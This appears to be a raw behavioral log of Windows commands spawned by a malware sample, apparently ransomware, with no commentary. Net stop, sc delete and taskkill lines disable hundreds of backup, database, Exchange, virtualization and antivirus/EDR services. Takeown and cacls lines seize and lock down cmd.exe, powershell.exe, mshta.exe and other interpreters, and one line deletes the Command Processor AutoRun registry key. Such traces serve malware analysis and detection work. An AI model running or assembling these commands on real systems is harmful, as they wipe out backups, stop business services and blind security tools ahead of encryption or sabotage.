- '<SYSTEM32>\net1.exe' stop GNWebService
- '<SYSTEM32>\sc.exe' delete "U8WorkerService1"
- '<SYSTEM32>\net1.exe' stop U8SendMailAdmin
- '<SYSTEM32>\net1.exe' stop CobianBackup10
- '<SYSTEM32>\sc.exe' delete UTUService
- '<SYSTEM32>\sc.exe' delete UFReportService
- '<SYSTEM32>\net1.exe' stop pcas
- '<SYSTEM32>\net1.exe' stop RTCAVMCU
- '<SYSTEM32>\sc.exe' delete MSCRMAsyncService$maintenance
- '<SYSTEM32>\sc.exe' delete "U8WebPool"
- '<SYSTEM32>\sc.exe' delete VmAgentDaemon
- '<SYSTEM32>\sc.exe' delete OpenFastAssist
- '<SYSTEM32>\net1.exe' stop MSExchangeThrottling
- '<SYSTEM32>\net1.exe' stop TPlusStdTaskService1220
- '<SYSTEM32>\net1.exe' stop ServiceMid
- '<SYSTEM32>\sc.exe' delete BackupExecJobEngine
- '<SYSTEM32>\sc.exe' delete ShareBoxMonitorService
- '<SYSTEM32>\net1.exe' stop MSExchangeSubmission
- '<SYSTEM32>\sc.exe' delete BackupExecAgentBrowser
- '<SYSTEM32>\sc.exe' delete savsvc
- '<SYSTEM32>\net1.exe' stop TPlusStdAppService1220
- '<SYSTEM32>\net1.exe' stop tmlisten
- '<SYSTEM32>\net1.exe' stop MSExchangeServiceHost
- '<SYSTEM32>\sc.exe' delete BackupExecRPCService
- '<SYSTEM32>\sc.exe' delete abs_deployer
- '<SYSTEM32>\net1.exe' stop MySQL
- '<SYSTEM32>\net1.exe' stop VeeamDistributionSvc
- '<SYSTEM32>\sc.exe' delete ShareBoxService
- '<SYSTEM32>\sc.exe' delete BackupExecDeviceMediaService
- '<SYSTEM32>\net1.exe' stop MSExchangeRPC
- '<SYSTEM32>\sc.exe' delete bedbg
- '<SYSTEM32>\sc.exe' delete MysoftUpdate
- '<SYSTEM32>\net1.exe' stop OracleDBConsoleilas
- '<SYSTEM32>\net1.exe' stop VeeamBrokerSvc
- '<SYSTEM32>\net1.exe' stop MSExchangeRepl
- '<SYSTEM32>\sc.exe' delete BackupExecAgentAccelerator
- '<SYSTEM32>\sc.exe' delete Mysoft.Setup.InstallService
- '<SYSTEM32>\net1.exe' stop "OracleOraDb10g_homeliSQL*Plus"
- '<SYSTEM32>\net1.exe' stop VeeamMountSvc
- '<SYSTEM32>\sc.exe' delete "Zabbix Agent"
- '<SYSTEM32>\sc.exe' delete Mysoft.SchedulingService
- '<SYSTEM32>\net1.exe' stop MSExchangePOP3BE
- '<SYSTEM32>\sc.exe' delete GPSFtpd
- '<SYSTEM32>\sc.exe' delete edr_monitor
- '<SYSTEM32>\net1.exe' stop VeeamCloudSvc
- '<SYSTEM32>\net1.exe' stop AutoUpdatePatchService
- '<SYSTEM32>\net1.exe' stop 360EntPGSvc
- '<SYSTEM32>\net1.exe' stop NFLicenceServer
- '<SYSTEM32>\sc.exe' delete "Rpc Monitor"
- '<SYSTEM32>\sc.exe' delete OfficeClearCache
- '<SYSTEM32>\net1.exe' stop MySQL5_OA
- '<SYSTEM32>\sc.exe' delete "EasyFZS Server"
- '<SYSTEM32>\sc.exe' delete U8SmsSrv
- '<SYSTEM32>\net1.exe' stop ImtsEventSvr
- '<SYSTEM32>\net1.exe' stop d_safe
- '<SYSTEM32>\net1.exe' stop MSExchangeUMCR
- '<SYSTEM32>\sc.exe' delete Serv-U
- '<SYSTEM32>\net1.exe' stop DDVRulesProcessor
- '<SYSTEM32>\net1.exe' stop AngelOfDeath
- '<SYSTEM32>\sc.exe' delete YunService
- '<SYSTEM32>\sc.exe' delete KICkSvr
- '<SYSTEM32>\sc.exe' delete TurboCRM70
- '<SYSTEM32>\net1.exe' stop MSExchangeUM
- '<SYSTEM32>\sc.exe' delete EASService
- '<SYSTEM32>\net1.exe' stop "FileZilla Server"
- '<SYSTEM32>\net1.exe' stop RavTask
- '<SYSTEM32>\net1.exe' stop MSExchangeTransportLogSearch
- '<SYSTEM32>\sc.exe' delete Gailun_Downloader
- '<SYSTEM32>\sc.exe' delete CIS
- '<SYSTEM32>\net1.exe' stop K3MobileServiceManage
- '<SYSTEM32>\net1.exe' stop ClickToRunSvc
- '<SYSTEM32>\sc.exe' delete TxQBService
- '<SYSTEM32>\sc.exe' delete "U8WorkerService2"
- '<SYSTEM32>\net1.exe' stop MSExchangeTransport
- '<SYSTEM32>\sc.exe' delete MDM
- '<SYSTEM32>\sc.exe' delete CloudExchangeService
- '<SYSTEM32>\net1.exe' stop TPlusStdUpgradeService1220
- '<SYSTEM32>\sc.exe' delete BackupExecManagementService
- '<SYSTEM32>\sc.exe' delete MSCRMUnzipService
- '<SYSTEM32>\net1.exe' stop VMnetDHCP
- '<SYSTEM32>\net1.exe' stop wanxiao-monitor
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /g Users:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /g Administrators:f
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\wscript.exe /a
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d system
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d "network service"
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /g Users:r
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /g Administrators:f
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d "network service"
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\FTP.exe /a
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d system
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d "network service"
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /g Users:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /g Administrators:f
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\FTP.exe /a
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d system
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d "network service"
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d "network service"
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\wscript.exe /a
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /a
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d system
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d "network service"
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /g Users:r
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /g Administrators:f
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\cscript.exe /a
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /g Users:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d system
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /g Users:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /g Administrators:f
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\cscript.exe /a
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d system
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d "network service"
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /g Users:r
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /g Administrators:f
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d system
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /g Administrators:f
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /g Administrators:r
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\net.exe /a
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d system
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d "network service"
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /g Users:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /g Administrators:f
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\net.exe /a
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /g system:r
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d "network service"
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /g Administrators:f
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /g Users:r
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /g Administrators:f
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\cmd.exe /a
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /g system:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /d "network service"
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /g Users:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /g Administrators:f
- '<SYSTEM32>\cmd.exe' /S /D /c" echo y"
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\cmd.exe /a
- '<SYSTEM32>\reg.exe' delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /g Administrators:f
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d system
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d "network service"
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /g Users:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /g Administrators:f
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\mshta.exe /a
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d system
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d "network service"
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /g Administrators:r
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\mshta.exe /a
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /g Users:r
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\net1.exe /a
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d system
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d "network service"
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /g Users:r
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /g Administrators:f
- '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\net1.exe /a
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d system
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d "network service"
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /g Users:r
- '<SYSTEM32>\net1.exe' stop UIODetect
- '<SYSTEM32>\sc.exe' delete ZTEVdservice
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d system
- '<SYSTEM32>\sc.exe' delete "ZTE USBIP Client"
- '<SYSTEM32>\sc.exe' delete VMTools
- '<SYSTEM32>\sc.exe' delete UIODetect
- '<SYSTEM32>\net1.exe' stop XenSvc
- '<SYSTEM32>\net1.exe' stop UFIDAWebService
- '<SYSTEM32>\net1.exe' stop VMAuthdService
- '<SYSTEM32>\sc.exe' delete ImeDictUpdateService
- '<SYSTEM32>\sc.exe' delete RTCDATAMCU
- '<SYSTEM32>\sc.exe' delete "ZTE USBIP Client Guard"
- '<SYSTEM32>\sc.exe' delete MSSQLServerOLAPService
- '<SYSTEM32>\sc.exe' delete WebAttendServer
- '<SYSTEM32>\sc.exe' delete JhTask
- '<SYSTEM32>\sc.exe' delete RTCIMMCU
- '<SYSTEM32>\sc.exe' delete ftusbrdsrv
- '<SYSTEM32>\sc.exe' delete RTCCDR
- '<SYSTEM32>\sc.exe' delete QcSoftService
- '<SYSTEM32>\net1.exe' stop Apache2.4
- '<SYSTEM32>\sc.exe' delete TCPIDDAService
- '<SYSTEM32>\net1.exe' stop VMUSBArbService
- '<SYSTEM32>\sc.exe' delete RTCMEETINGMCU
- '<SYSTEM32>\sc.exe' delete ftusbrdwks
- '<SYSTEM32>\sc.exe' delete MSSQLSERVER
- '<SYSTEM32>\sc.exe' delete K3MobileService
- '<SYSTEM32>\net1.exe' stop Realtek11nSU
- '<SYSTEM32>\net1.exe' stop "memcached Server"
- '<SYSTEM32>\sc.exe' delete MSSQLFDLauncher
- '<SYSTEM32>\sc.exe' delete aspnet_state @sc delete Redis
- '<SYSTEM32>\sc.exe' delete "UtilDev Web Server Pro"
- '<SYSTEM32>\net1.exe' stop TeamViewer8
- '<SYSTEM32>\sc.exe' delete RtcQms
- '<SYSTEM32>\net1.exe' stop xenlite
- '<SYSTEM32>\sc.exe' delete TeamViewer
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
- '<SYSTEM32>\sc.exe' delete "wanxiao-monitor"
- '<SYSTEM32>\sc.exe' delete SPTimerV4
- '<SYSTEM32>\sc.exe' delete "Kiwi Syslog Server"
- '<SYSTEM32>\sc.exe' delete RabbitMQ
- '<SYSTEM32>\sc.exe' delete "vm-agent"
- '<SYSTEM32>\net1.exe' stop MSExchangeAntispamUpdate
- '<SYSTEM32>\sc.exe' delete AlibabaProtect
- '<SYSTEM32>\sc.exe' delete SPSearchHostController
- '<SYSTEM32>\sc.exe' delete "Flash Helper Service"
- '<SYSTEM32>\sc.exe' delete ReportServer
- '<SYSTEM32>\net1.exe' stop mysqltransport
- '<SYSTEM32>\net1.exe' stop DellDRLogSvc
- '<SYSTEM32>\sc.exe' delete VMwareHostd
- '<SYSTEM32>\sc.exe' delete qemu-ga
- '<SYSTEM32>\sc.exe' delete SPAdminV4
- '<SYSTEM32>\sc.exe' delete UI0Detect
- '<SYSTEM32>\sc.exe' delete allpass_redisservice_port21160
- '<SYSTEM32>\sc.exe' delete VMUSBArbService
- '<SYSTEM32>\net1.exe' stop "Synology Drive VSS Service x64"
- '<SYSTEM32>\net1.exe' stop MSExchangeADTopology
- '<SYSTEM32>\net1.exe' stop WebAttendServer
- '<SYSTEM32>\sc.exe' delete ProjectQueueService16
- '<SYSTEM32>\sc.exe' delete wwbizsrv
- '<SYSTEM32>\sc.exe' delete MSDTC
- '<SYSTEM32>\sc.exe' delete VMAuthdService
- '<SYSTEM32>\sc.exe' delete MCService
- '<SYSTEM32>\sc.exe' delete ProjectEventService16
- '<SYSTEM32>\sc.exe' delete "ZTE FileTranS"
- '<SYSTEM32>\sc.exe' delete VGAuthService
- '<SYSTEM32>\net1.exe' stop Apache2.2
- '<SYSTEM32>\net1.exe' stop MSComplianceAudit
- '<SYSTEM32>\sc.exe' delete XT800Service_Personal
- '<SYSTEM32>\net1.exe' stop FirebirdGuardianDeafaultInstance
- '<SYSTEM32>\sc.exe' delete SQLBrowser
- '<SYSTEM32>\cmd.exe' /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDA...
- '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc d...
- '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete Qc...
- '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d system
- '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d "network service"
- '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d SERVICE
- '<SYSTEM32>\cacls.exe' C:\Users\Public /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' C:\Users\Public /e /g Users:r
- '<SYSTEM32>\cacls.exe' C:\Users\Public /g Administrators:f
- '<SYSTEM32>\takeown.exe' /f C:\Users\Public /a
- '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d system
- '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d "network service"
- '<SYSTEM32>\cmd.exe' /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc ...
- '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /g Users:r
- '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /g Administrators:f
- '<SYSTEM32>\takeown.exe' /f %ALLUSERSPROFILE% /a
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
- '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
- '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d SERVICE
- '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
- '<SYSTEM32>\sc.exe' delete FxService
- '<SYSTEM32>\cmd.exe' /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop ...
- '<SYSTEM32>\net1.exe' stop "igfxCUIService2.0.0.0"
- '<SYSTEM32>\net1.exe' stop U8WorkerService2
- '<SYSTEM32>\sc.exe' delete RTCAVMCU
- '<SYSTEM32>\sc.exe' delete EnergyDataService
- '<SYSTEM32>\net1.exe' stop VMwareHostd
- '<SYSTEM32>\sc.exe' delete SQLWriter
- '<SYSTEM32>\sc.exe' delete OracleVssWriterORCL
- '<SYSTEM32>\sc.exe' delete ftnlses3
- '<SYSTEM32>\sc.exe' delete RTCATS
- '<SYSTEM32>\sc.exe' delete eCardMPService
- '<SYSTEM32>\sc.exe' delete SQLSERVERAGENT
- '<SYSTEM32>\sc.exe' delete OracleOraDb11g_home1TNSListener
- '<SYSTEM32>\sc.exe' delete ftnlsv3
- '<SYSTEM32>\sc.exe' delete REPLICA
- '<SYSTEM32>\sc.exe' delete OracleServiceORCL
- '<SYSTEM32>\sc.exe' delete "eCard-TTransServer"
- '<SYSTEM32>\net1.exe' stop HaoZipSvc
- '<SYSTEM32>\net1.exe' stop U8WorkerService1
- '<SYSTEM32>\sc.exe' delete MSCRMAsyncService
- '<SYSTEM32>\sc.exe' delete "UWS LoPriv Services"
- '<SYSTEM32>\sc.exe' delete OracleOraDb11g_home1ClrAgent
- '<SYSTEM32>\sc.exe' delete "XT800Service_Personal"
- '<SYSTEM32>\sc.exe' delete "DAService_TCP"
- '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @t...
- '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill...
- '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_ma...
- '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & ...
- '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingser...
- '<SYSTEM32>\cmd.exe' /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer ...
- '<SYSTEM32>\cmd.exe' /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Servi...
- '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusb...
- '<SYSTEM32>\net1.exe' stop UTUService